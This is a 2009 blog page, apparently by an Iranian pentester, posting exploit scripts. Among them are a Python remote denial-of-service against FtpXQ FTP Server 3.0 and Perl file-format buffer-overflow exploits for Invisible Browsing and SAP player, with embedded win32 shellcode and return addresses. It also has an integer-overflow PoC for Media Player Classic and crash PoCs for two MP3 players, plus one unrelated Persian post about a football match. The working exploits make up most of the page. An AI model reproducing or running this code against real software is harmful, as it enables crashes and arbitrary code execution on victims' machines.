Tuesday, September 15, 2009

FtpXQ FTP Server 3.0 Remote Denial of Service Exploit


#!/usr/bin/python
print "############################################################"
print "## Iranian Pentesters Home ##"
print "## Www.Pentesters.Ir ##"
print "## PLATEN -[ H.jafari ]- ##"
print "## FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ##"
print "## author: PLATEN ##"
print "## E-mail && blog: ##"
print "## hjafari.blogspot.com ##"
print "## platen.secure[at]gmail[dot]com ##"
print "## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##"
print "## and all members in Pentesters.ir ##"
print "############################################################"
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
buffer= "./A" * 6300
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"

sock.send("ABOR %s\r\n" %buffer)
sock.close()

if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)



http://www.milw0rm.com/exploits/9664

http://packetstormsecurity.com/0909-exploits/ftpxq-dos.txt

Monday, September 14, 2009

Tabriz red

bi rabte vali dishab estadium bodim aqa yak hali dad trip fagat barselonay bod felasher haye riZ moje mekzikiu O o E O A hameye shahr germez shode bod
en khabar gozariya goftan 80 hezar vali man migam bishatr az 100 hezar nafar bodan estadium akhe ena ke nadidan ...:d
en aksaram ba gushi gereftam hot hot halesho bebarin :d
jaye hamat0n khali :d :X



Invisible Browsing 5.0.52 (.ibkey) Local Buffer Overflow Exploit

#!/usr/bin/perl

print qq(
############################################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit ##
## bug found & exploited by: PLATEN ##
## E-mail && blog: ##
## hjafari.blogspot.com ##
## platen.secure[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
############################################################
);
# Note: I just test this version
$junk ="\x41"x 5000;
$ret = "\x93\x43\x92\x7c";
$nop = "\x90" x 50;
# win32_exec - Size=160
#EXITFUNC=seh CMD=calc
#Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
open(fhandle,'>>expl.ibkey');
print fhandle $junk.$ret.$nop.$shellcode;
close(fhandle);
print "\n [+] File created successfully: expl.ibkey \n";



Wednesday, September 9, 2009

Media Player Classic 6.4.9(.mid) Integer Overflow PoC

#!/usr/bin/perl
print qq(

  ############################################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Media Player Classic 6.4.9(.mid) Integer Overflow PoC ##
## Vulnerability Discovered By : PLATEN ##
## E-mail && blog: ##
## hjafari.blogspot.com ##
## platen.secure[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
############################################################
);
$boom = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";
open(fhandle,'>>expl.mid') || die "can't create file: expl.mid";
print fhandle $boom;
close(fhandle);
print "\n [+] File created successfully: expl.mid \n";




http://www.milw0rm.com/exploits/9620
http://packetstormsecurity.com/0909-exploits/mpc649-overflow.txt

Thursday, September 3, 2009

SAP player 0.9 (.m3u) Universal Local BoF Exploit(SEH)

#!/usr/bin/perl

$junk="\x41"x 35496;
$nseh = "\xEB\x06\x90\x90"; #short jump over SEH handler
$seh="\x27\x4a\x01\x10"; #universal p/p/r
$nop="\x90"x 100;
# win32_exec - Size=160
#EXITFUNC=seh CMD=calc
#Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
open(fhandle,'>>expl.m3u');
print fhandle $junk.$nseh.$seh.$nop.$shellcode;
close(fhandle);
print "\n [+] File created successfully: expl.m3u \n";


Tuesday, August 25, 2009

two music player crash vulnerability

hi
Pico MP3 Player 1.0 (.mp3 File) Local File Crash PoC
http://thaddy.co.uk/picomp3.zip

#!/usr/bin/perl
# platen.secure [at] gmail.com
# Pico MP3 Player 1.0 (.mp3 File) Local File Crash PoC
my $crash="A" x 2500;
open(myfile,'>>poc.mp3');
print myfile $crash;

http://packetstormsecurity.org/0908-exploits/pico-dos.txt


#################################################################

yPlay Player 1.0 (.mp3 ) Local File Crash PoC
http://www.spacejock.com/yPlay_Download.html

#!/usr/bin/perl
# platen.secure [at] gmail.com
# yPlay Player 1.0 (.mp3 ) Local File Crash PoC
# http://www.spacejock.com/yPlay_Download.html
my $crash="A" x 2500;
open(myfile,'>>poc.mp3');
print myfile $crash;

http://packetstormsecurity.org/0908-exploits/yplay-crash.txt

usage: first save exploite in expl.pl file and then run this command perl expl.pl \ exploite create poc.mp3 file. if you open poc.mp3 file by vulnerability players , player crash!

two webapp

Xplode CMS (SQL/XSS) Multiple Remote Vuln -link-
Shopmaker CMS 2.0 (bSQL/ LFI) Multiple Remote Vulnerabilities -link-